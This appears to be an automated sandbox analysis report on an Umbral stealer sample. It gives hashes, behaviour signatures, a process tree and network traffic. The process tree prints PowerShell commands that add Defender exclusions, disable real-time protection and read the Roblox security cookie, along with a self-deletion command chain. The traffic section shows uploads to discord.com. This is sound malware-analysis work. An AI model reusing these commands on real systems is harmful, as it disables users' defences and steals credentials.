Analysis

  • max time kernel
    91s
  • max time network
    93s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    05-08-2024 16:04

General

  • Target

    Umbral.exe

  • Size

    496KB

  • MD5

    2989b8a064354c5fa729d713b84df30e

  • SHA1

    a8f8065b500258e7b768c59f9c6f57932d4bcfa1

  • SHA256

    bbdd54660f7cfee0d7ec0d5afa51900142c029ae48e71f8d4f834cac00b1761b

  • SHA512

    0d5b22d39dff8030755bb120c598aec238549100fb53c40468be7f6adb036867bf464fc9c71b204824f7042faa18cbb90ab199ce450844371b42b79c22fb3e94

  • SSDEEP

    12288:VoZtL+EP8jNMGxfEY3tmfh8ItWCw8ZOG:jI85MGxfEY3tmfh8ItDwaO

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2840
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1404
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:228
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3836
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1028
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3544
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:2432
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:2584
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          PID:1444
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          2⤵
          • Detects videocard installed
          PID:4616
        • C:\Windows\SYSTEM32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
          2⤵
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1076
          • C:\Windows\system32\PING.EXE
            ping localhost
            3⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4848

      Network

      • flag-us
        DNS
        gstatic.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        gstatic.com
        IN A
        Response
        gstatic.com
        IN A
        172.217.23.195
      • flag-us
        DNS
        8.8.8.8.in-addr.arpa
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        8.8.8.8.in-addr.arpa
        IN PTR
        Response
        8.8.8.8.in-addr.arpa
        IN PTR
        dnsgoogle
      • flag-us
        DNS
        ip-api.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        ip-api.com
        IN A
        Response
        ip-api.com
        IN A
        208.95.112.1
      • flag-us
        DNS
        195.23.217.172.in-addr.arpa
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        195.23.217.172.in-addr.arpa
        IN PTR
        Response
        195.23.217.172.in-addr.arpa
        IN PTR
        ams16s37-in-f31e100net
        195.23.217.172.in-addr.arpa
        IN PTR
        prg03s05-in-f3�H
        195.23.217.172.in-addr.arpa
        IN PTR
        prg03s05-in-f195�H
      • flag-us
        DNS
        1.112.95.208.in-addr.arpa
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        1.112.95.208.in-addr.arpa
        IN PTR
        Response
        1.112.95.208.in-addr.arpa
        IN PTR
        ip-apicom
      • flag-us
        DNS
        discord.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        discord.com
        IN A
        Response
        discord.com
        IN A
        162.159.136.232
        discord.com
        IN A
        162.159.137.232
        discord.com
        IN A
        162.159.128.233
        discord.com
        IN A
        162.159.138.232
        discord.com
        IN A
        162.159.135.232
      • flag-us
        DNS
        232.136.159.162.in-addr.arpa
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        232.136.159.162.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        nexusrules.officeapps.live.com
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        nexusrules.officeapps.live.com
        IN A
        Response
        nexusrules.officeapps.live.com
        IN CNAME
        prod.nexusrules.live.com.akadns.net
        prod.nexusrules.live.com.akadns.net
        IN A
        52.111.229.43
      • flag-us
        DNS
        43.229.111.52.in-addr.arpa
        Umbral.exe
        Remote address:
        8.8.8.8:53
        Request
        43.229.111.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        GET
        http://ip-api.com/line/?fields=hosting
        Umbral.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /line/?fields=hosting HTTP/1.1
        Host: ip-api.com
        Connection: Keep-Alive
        Response
        HTTP/1.1 200 OK
        Date: Mon, 05 Aug 2024 16:04:23 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 6
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • flag-us
        GET
        http://ip-api.com/json/?fields=225545
        Umbral.exe
        Remote address:
        208.95.112.1:80
        Request
        GET /json/?fields=225545 HTTP/1.1
        Host: ip-api.com
        Response
        HTTP/1.1 200 OK
        Date: Mon, 05 Aug 2024 16:04:26 GMT
        Content-Type: application/json; charset=utf-8
        Content-Length: 161
        Access-Control-Allow-Origin: *
        X-Ttl: 60
        X-Rl: 44
      • 172.217.23.195:443
        gstatic.com
        tls
        Umbral.exe
        803 B
        5.2kB
        8
        8
      • 208.95.112.1:80
        http://ip-api.com/line/?fields=hosting
        http
        Umbral.exe
        310 B
        267 B
        5
        2

        HTTP Request

        GET http://ip-api.com/line/?fields=hosting

        HTTP Response

        200
      • 208.95.112.1:80
        http://ip-api.com/json/?fields=225545
        http
        Umbral.exe
        285 B
        470 B
        5
        3

        HTTP Request

        GET http://ip-api.com/json/?fields=225545

        HTTP Response

        200
      • 162.159.136.232:443
        discord.com
        tls
        Umbral.exe
        519.1kB
        13.0kB
        385
        140
      • 8.8.8.8:53
        gstatic.com
        dns
        Umbral.exe
        602 B
        1.1kB
        9
        9

        DNS Request

        gstatic.com

        DNS Response

        172.217.23.195

        DNS Request

        8.8.8.8.in-addr.arpa

        DNS Request

        ip-api.com

        DNS Response

        208.95.112.1

        DNS Request

        195.23.217.172.in-addr.arpa

        DNS Request

        1.112.95.208.in-addr.arpa

        DNS Request

        discord.com

        DNS Response

        162.159.136.232
        162.159.137.232
        162.159.128.233
        162.159.138.232
        162.159.135.232

        DNS Request

        232.136.159.162.in-addr.arpa

        DNS Request

        nexusrules.officeapps.live.com

        DNS Response

        52.111.229.43

        DNS Request

        43.229.111.52.in-addr.arpa

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        1a9fa92a4f2e2ec9e244d43a6a4f8fb9

        SHA1

        9910190edfaccece1dfcc1d92e357772f5dae8f7

        SHA256

        0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

        SHA512

        5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        948B

        MD5

        6aa2fca4712a213a6961a9b42cedaadb

        SHA1

        81da2cba9f21527a1ee07596d0a5a8c11c27ec84

        SHA256

        818ba8689d5e1508fbd0f1183ec4cd7b920236975243b5c8a7c69ae1ce06a6b8

        SHA512

        69f5a0fe0a020f027bcf16e30735e2e7983b4ba89360304ff05a2bb6c375b186730f575e0ba2fde6c5f3d95d256ec70a42cca62bcfa0e9c7a263b207c9c183e8

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        7332074ae2b01262736b6fbd9e100dac

        SHA1

        22f992165065107cc9417fa4117240d84414a13c

        SHA256

        baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

        SHA512

        4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        e8ad350bb24c7ab38efd0ef0553239c7

        SHA1

        887c19e4c11de19854458e26a1ed05b67a75bf29

        SHA256

        5cf85b38cbbf1a064a4f8001a0ec031993d44e46b8e65d713785c84916cb8ffd

        SHA512

        74fef147e98b8b576712c212174a7793deb619d54c7ac7956e38ed4e09202f0c93ae4ec9e89cd4d0ac79c481d30c5c3fc5a3d042537c74d7bffda1f8453aef6e

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bgwexpr1.oaa.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • memory/2840-67-0x0000023530650000-0x000002353065A000-memory.dmp

        Filesize

        40KB

      • memory/2840-33-0x0000023530540000-0x000002353055E000-memory.dmp

        Filesize

        120KB

      • memory/2840-85-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp

        Filesize

        10.8MB

      • memory/2840-68-0x0000023530680000-0x0000023530692000-memory.dmp

        Filesize

        72KB

      • memory/2840-2-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp

        Filesize

        10.8MB

      • memory/2840-31-0x00000235305C0000-0x0000023530636000-memory.dmp

        Filesize

        472KB

      • memory/2840-32-0x0000023530570000-0x00000235305C0000-memory.dmp

        Filesize

        320KB

      • memory/2840-1-0x00007FFBA39D3000-0x00007FFBA39D5000-memory.dmp

        Filesize

        8KB

      • memory/2840-0-0x0000023515DB0000-0x0000023515E32000-memory.dmp

        Filesize

        520KB

      • memory/3836-14-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp

        Filesize

        10.8MB

      • memory/3836-12-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp

        Filesize

        10.8MB

      • memory/3836-13-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp

        Filesize

        10.8MB

      • memory/3836-8-0x000001E7B90E0000-0x000001E7B9102000-memory.dmp

        Filesize

        136KB

      • memory/3836-17-0x00007FFBA39D0000-0x00007FFBA4492000-memory.dmp

        Filesize

        10.8MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.